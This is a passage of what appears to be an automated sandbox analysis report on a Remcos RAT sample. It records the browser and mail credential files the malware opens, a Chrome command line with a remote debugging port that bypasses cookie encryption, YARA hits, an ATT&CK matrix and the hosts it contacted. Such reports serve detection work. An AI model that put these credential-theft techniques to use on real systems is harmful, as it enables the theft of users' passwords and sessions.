              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: ESMTPPassword10_2_004033F0
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, PopPassword10_2_00402DB3
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy, SMTPPassword10_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5024, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6196, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Attempt to bypass Chrome Application-Bound Encryption
              Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir=C:\Users\user\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
              Detected Remcos RAT
              Source: C:\Windows\SysWOW64\msiexec.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-HMKDWQJump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000003.144377552368.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144376861712.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148899066974.0000000021140000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148889275088.000000000327F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.148892015439.0000000005496000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000003.144376861712.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5024, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Disable or Modify Tools              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts11
              Native API              		1
              Registry Run Keys / Startup Folder              		1
              Extra Window Memory Injection              		1
              Deobfuscate/Decode Files or Information              		11
              Input Capture              		1
              Network Service Discovery              		Remote Desktop Protocol1
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts12
              Command and Scripting Interpreter              		Logon Script (Windows)1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		1
              Credentials in Registry              		1
              Account Discovery              		SMB/Windows Admin Shares11
              Input Capture              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell              		Login Hook412
              Process Injection              		1
              Software Packing              		NTDS3
              File and Directory Discovery              		Distributed Component Object Model2
              Clipboard Data              		2
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		LSA Secrets28
              System Information Discovery              		SSHKeylogging3
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Extra Window Memory Injection              		Cached Domain Credentials231
              Security Software Discovery              		VNCGUI Input Capture14
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
              Masquerading              		DCSync11
              Virtualization/Sandbox Evasion              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Modify Registry              		Proc Filesystem4
              Process Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
              Virtualization/Sandbox Evasion              		/etc/passwd and /etc/shadow1
              Application Window Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
              Access Token Manipulation              		Network Sniffing1
              System Owner/User Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd412
              Process Injection              		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1553438 Sample: rPO3799039985.exe Startdate: 11/11/2024 Architecture: WINDOWS Score: 100 66 svc.ms-acdc-teams.office.com 2->66 68 svc.ha-teams.office.com 2->68 70 11 other IPs or domains 2->70 102 Suricata IDS alerts for network traffic 2->102 104 Found malware configuration 2->104 106 Multi AV Scanner detection for submitted file 2->106 108 7 other signatures 2->108 10 rPO3799039985.exe 21 2->10         started        14 msedge.exe 23 162 2->14         started        signatures3 process4 file5 58 C:\Users\user\...\Martyrization.Pra121, ASCII 10->58 dropped 110 Suspicious powershell command line found 10->110 16 powershell.exe 28 10->16         started        112 Maps a DLL or memory area into another process 14->112 20 msedge.exe 14->20         started        23 identity_helper.exe 14->23         started        25 identity_helper.exe 14->25         started        signatures6 process7 dnsIp8 54 C:\Users\user\AppData\...\rPO3799039985.exe, PE32 16->54 dropped 56 C:\...\rPO3799039985.exe:Zone.Identifier, ASCII 16->56 dropped 92 Early bird code injection technique detected 16->92 94 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->94 96 Writes to foreign memory regions 16->96 98 5 other signatures 16->98 27 msiexec.exe 10 31 16->27         started        32 conhost.exe 16->32         started        72 dns.quad9.net 149.112.112.112, 443, 55810, 59315 QUAD9-AS-1US United States 20->72 74 svc.ms-acdc-teams.office.com 52.123.251.14, 443, 63505 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 20->74 76 2 other IPs or domains 20->76 file9 signatures10 process11 dnsIp12 82 87.120.114.20, 49769, 49770, 49771 UNACS-AS-BG8000BurgasBG Bulgaria 27->82 84 filetransfer.io 104.21.13.139, 443, 49767 CLOUDFLARENETUS United States 27->84 86 3 other IPs or domains 27->86 64 C:\ProgramData\remcos\logs.dat, data 27->64 dropped 114 Detected Remcos RAT 27->114 116 Attempt to bypass Chrome Application-Bound Encryption 27->116 118 Tries to steal Mail credentials (via file registry) 27->118 120 3 other signatures 27->120 34 msiexec.exe 14 27->34         started        37 msiexec.exe 1 27->37         started        39 chrome.exe 27->39         started        42 3 other processes 27->42 file13 signatures14 process15 dnsIp16 100 Tries to harvest and steal browser information (history, passwords, etc) 34->100 78 192.168.11.20, 137, 138, 1900 unknown unknown 39->78 80 239.255.255.250, 1900 unknown Reserved 39->80 45 chrome.exe 39->45         started        60 C:\Users\user\AppData\...\download_cache, COM 42->60 dropped 62 C:\Users\user\AppData\Local\Temp\...\cache, COM 42->62 dropped 48 msedge.exe 42->48         started        50 conhost.exe 42->50         started        52 reg.exe 1 1 42->52         started        file17 signatures18 process19 dnsIp20 88 googlehosted.l.googleusercontent.com 172.217.215.132, 443, 49781 GOOGLEUS United States 45->88 90 clients2.googleusercontent.com 45->90

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              rPO3799039985.exe18%VirustotalBrowse
              rPO3799039985.exe8%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Badefaciliteter140\Head158\rekvireringen\rPO3799039985.exe8%ReversingLabs
              C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\local\cache0%ReversingLabs
              C:\Users\user\AppData\Local\Temp\TmpUserData\SmartScreen\local\download_cache0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              s20.filetransfer.io0%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              https://unitedstates1.ss.wd.microsoft.us-10010%Avira URL Cloudsafe
              https://publickeyservice.gcp.privacysandboxservices.com0%Avira URL Cloudsafe
              http://unisolated.invalid/0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              http://crbug.com/11657510%Avira URL Cloudsafe
              http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
              http://www.imvu.comata0%Avira URL Cloudsafe
              http://crbug.com/11657510%VirustotalBrowse
              https://crbug.com/5930240%Avira URL Cloudsafe
              https://drive-daily-2.corp.google.com/0%Avira URL Cloudsafe
              https://issuetracker.google.com/3494892480%Avira URL Cloudsafe
              https://s20.filetransfer.io/W0%Avira URL Cloudsafe
              https://drive-daily-1.corp.google.com/0%Avira URL Cloudsafe
              https://drive-daily-5.corp.google.com/0%Avira URL Cloudsafe
              http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
              http://anglebug.com/47220%Avira URL Cloudsafe
              http://anglebug.com/14520%Avira URL Cloudsafe
              https://drive-preprod.corp.google.com/0%Avira URL Cloudsafe
              https://s20.filetransfer.io//0%Avira URL Cloudsafe
              http://pesterbdd.com/images/Pester.png40%Avira URL Cloudsafe
              http://anglebug.com/50070%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              svc.ms-acdc-teams.office.com
              		52.123.251.14
              		truefalse
                		high
                chrome.cloudflare-dns.com
                		172.64.41.3
                		truefalse
                  		high
                  geoplugin.net
                  		178.237.33.50
                  		truefalse
                    		high
                    dns.quad9.net
                    		149.112.112.112
                    		truefalse
                      		high
                      sb.scorecardresearch.com
                      		3.163.101.92
                      		truefalse
                        		high
                        filetransfer.io
                        		104.21.13.139
                        		truefalse
                          		high
                          s20.filetransfer.io
                          		172.67.200.96
                          		truefalseunknown
                          googlehosted.l.googleusercontent.com
                          		172.217.215.132
                          		truefalse
                            		high
                            clients2.googleusercontent.com
                            		unknown
                            		unknownfalse
                              		high
                              assets.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                c.msn.com
                                		unknown
                                		unknownfalse
                                  		high
                                  deff.nelreports.net
                                  		unknown
                                  		unknownfalse
                                    		high
                                    ntp.msn.com
                                    		unknown
                                    		unknownfalse
                                      		high
                                      api.msn.com
                                      		unknown
                                      		unknownfalse
                                        		high

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabchrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmp, Web Data.17.drfalse
                                          		high
                                          https://mail.google.com/mail/?usp=installed_webappchrome.exe, 00000008.00000002.144263481982.000012AC00F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144262805081.000012AC00E50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144265218991.000012AC01304000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchWeb Data.17.drfalse
                                              		high
                                              http://www.imvu.comrmsiexec.exe, 00000004.00000002.148901845750.0000000021E20000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://duckduckgo.com/ac/?q=Web Data.17.drfalse
                                                		high
                                                https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000008.00000002.144256128104.000012AC00120000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144257598930.000012AC003E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://unitedstates1.ss.wd.microsoft.us-1001msedge.exe, 0000000F.00000002.144308375290.0000014B7C700000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://uk.search.yahoo.com/search?ei=&fr=crmas&p=chrome.exe, 00000008.00000002.144261885134.000012AC00CC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bchrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://docs.google.com/document/Jchrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://blog.google/products/chrome/google-chrome-safe-browsing-real-time/chrome.exe, 00000008.00000002.144261441489.000012AC00BC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://shop.advanceautoparts.com/web/OrderItemDisplaychrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.nirsoft.netmsiexec.exe, 00000009.00000002.144189871263.0000000002E8F000.00000004.00000010.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://aefd.nelreports.net/api/report?cat=bingaotakReporting and NEL.20.drfalse
                                                                		high
                                                                https://deff.nelreports.net/api/report?cat=msnReporting and NEL.20.drfalse
                                                                  		high
                                                                  https://aefd.nelreports.net/api/report?cat=bingcspReporting and NEL.20.drfalse
                                                                    		high
                                                                    http://dns-tunnel-check.googlezip.net/connectchrome.exe, 00000008.00000002.144263008450.000012AC00EC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://publickeyservice.gcp.privacysandboxservices.comchrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://docs.google.com/chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.google.com/document/:chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.therealreal.com/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://chrome.google.com/webstore?hl=enWebchrome.exe, 00000008.00000002.144259219060.000012AC00770000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://publickeyservice.pa.aws.privacysandboxservices.comchrome.exe, 00000008.00000003.144232760854.000012AC010C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.shutterfly.com/cart/chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://www.urbanoutfitters.com/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.saksfifthavenue.com/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.zappos.com/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.guitarcenter.com/cartchrome.exe, 00000008.00000002.144259430093.000012AC007B3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://crbug.com/1165751msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • 0%, Virustotal, Browse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://unisolated.invalid/chrome.exe, 00000008.00000002.144260631416.000012AC009A4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=chrome.exe, 00000008.00000002.144263189888.000012AC00F20000.00000004.00000800.00020000.00000000.sdmp, Web Data.17.drfalse
                                                                                            		high
                                                                                            https://www.altardstate.com/cart/chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://drive.google.com/?lfhs=2chrome.exe, 00000008.00000002.144265313357.000012AC0134C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144265403166.000012AC01398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264933828.000012AC01280000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144259144198.000012AC00766000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.adorama.com/als.mvc/cartviewchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.bedbathandbeyond.com/store/cartchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.bestbuy.com/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://www.ikea.com/us/en/shoppingcart/chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://www.imvu.comatamsiexec.exe, 0000000B.00000003.144170842635.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.144170955946.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.144171023674.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144172323389.00000000031AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          		unknown
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.144019020175.0000000004EC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://www.google.com/chrome/browser-tools/chrome.exe, 00000008.00000002.144261607698.000012AC00C14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.williams-sonoma.com/shoppingcart/chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                http://www.imvu.com/msiexec.exe, 0000000B.00000002.144171415973.0000000002CCC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://crbug.com/593024chrome.exe, 00000008.00000002.144261762952.000012AC00C50000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144233363066.000012AC00CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144316646821.000064280043C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144316730054.0000642800454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000003.144303100044.0000642800450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://docs.google.com/presentation/chrome.exe, 00000008.00000002.144265403166.000012AC01398000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144265017944.000012AC012A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144264857051.000012AC01250000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://duckduckgo.com/?q=chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://chrome.google.com/webstorechrome.exe, 00000008.00000002.144256031394.000012AC000F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000000F.00000002.144315499677.0000642800170000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://drive-daily-2.corp.google.com/chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.youtube.com/s/notifications/manifest/cr_install.html7chrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.imvu.commsiexec.exe, msiexec.exe, 0000000B.00000003.144170842635.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000003.144170955946.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144171198666.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 0000000B.00000003.144171023674.00000000031AD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000B.00000002.144172323389.00000000031AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://contoso.com/Iconpowershell.exe, 00000002.00000002.144023424474.0000000005F29000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://issuetracker.google.com/349489248chrome.exe, 00000008.00000002.144258340243.000012AC00560000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144206111077.000012AC00C9C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000008.00000002.144263390938.000012AC00F68000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Web Data.17.drfalse
                                                                                                                                    		high
                                                                                                                                    https://www.teacherspayteachers.com/Cartchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://www.lulus.com/checkout/bagchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://www.costco.com/CheckoutCartDisplayViewchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=bcr_components/customize_color_schrome.exe, 00000008.00000002.144259830065.000012AC00820000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.ae.com/us/en/cartchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplaychrome.exe, 00000008.00000002.144258258607.000012AC00510000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://www.qvc.com/checkout/cart.htmlchrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://s20.filetransfer.io/Wmsiexec.exe, 00000004.00000003.144118475021.00000000054E8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.148892015439.00000000054A1000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.144377552368.00000000054E7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://www.ecosia.org/newtab/chrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://drive-daily-1.corp.google.com/chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://cart.ebay.com/chrome.exe, 00000008.00000002.144260184743.000012AC008D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.144019020175.0000000005018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://drive-daily-5.corp.google.com/chrome.exe, 00000008.00000002.144265875695.000012AC01560000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://duckduckgo.com/favicon.icochrome.exe, 00000008.00000002.144262848392.000012AC00E64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.144208274532.000012AC00E90000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://www.amazon.com/gp/cart/view.htmlchrome.exe, 00000008.00000002.144260537891.000012AC00980000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
